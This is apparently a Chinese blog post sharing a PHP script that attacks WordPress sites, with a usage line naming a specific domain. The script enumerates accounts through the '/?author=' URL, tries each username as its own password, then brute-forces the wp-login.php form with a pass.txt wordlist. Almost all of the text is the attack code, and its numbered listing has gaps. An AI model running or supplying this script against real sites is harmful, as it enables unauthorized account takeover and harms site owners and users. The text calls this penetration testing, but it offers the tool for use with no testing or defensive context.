我认为,在某些情况下渗透测试者遇到的最新版本和没有安装插件的wordpress,我们可以利用一些暴力的方法来进行渗透。
事实上我们通过列举的用户名:/?author=,然后试着猜相同的用户名和密码的帐户。如果我们不成功,则可以通过目录下的pass.txt继续暴力破解来得到结果,这个脚本默认列举了10个用户,你自行修改。
Usage:
php wordpress.php http://www.chncto.com
07 |
for ($i=1; $i <= 10; $i++) { |
09 |
$url = $domain."/?author=".$i; |
10 |
$response = httprequest($url,0); |
11 |
if ($response == 404) { |
14 |
$pattern = "/author\/(.*)\/feed/"; |
15 |
preg_match($pattern, $response, $name); |
16 |
$namearray[] = $name[1]; |
19 |
echo "totally got".count($namearray)."users\n"; |
21 |
echo "attempting same username&password:\n"; |
23 |
$crackname = crackpassword($namearray,"same"); |
25 |
$passwords = file("pass.txt"); |
27 |
echo "attempting weak password:\n"; |
30 |
$namearray = array_diff($namearray,$crackname); |
33 |
crackpassword($namearray,$passwords); |
35 |
function crackpassword($namearray,$passwords){ |
38 |
foreach ($namearray as $name) { |
39 |
$url = $domain."/wp-login.php"; |
40 |
if ($passwords == "same") { |
41 |
$post = "log=".urlencode($name)."&pwd=".urlencode($name)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; |
42 |
$pos = strpos(httprequest($url,$post),'div id="login_error"'); |
44 |
echo "$name $name"."\n"; |
48 |
foreach ($passwords as $pass) { |
49 |
$post = "log=".urlencode($name)."&pwd=".urlencode($pass)."&wp-submit=%E7%99%BB%E5%BD%95&redirect_to=".urlencode($domain)."%2Fwp-admin%2F&testcookie=1"; |
50 |
$pos = strpos(httprequest($url,$post),'div id="login_error"'); |
52 |
echo "$name $pass"."\n"; |
60 |
function httprequest($url,$post){ |
62 |
curl_setopt($ch, CURLOPT_URL, "$url"); |
63 |
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); |
64 |
curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); |
65 |
curl_setopt($ch, CURLOPT_FOLLOWLOCATION,1); |
68 |
curl_setopt($ch, CURLOPT_POST, 1); |
69 |
curl_setopt($ch, CURLOPT_POSTFIELDS, $post); |
72 |
$output = curl_exec($ch); |
73 |
$httpcode = curl_getinfo($ch,CURLINFO_HTTP_CODE); |
76 |
if ($httpcode == 404) { |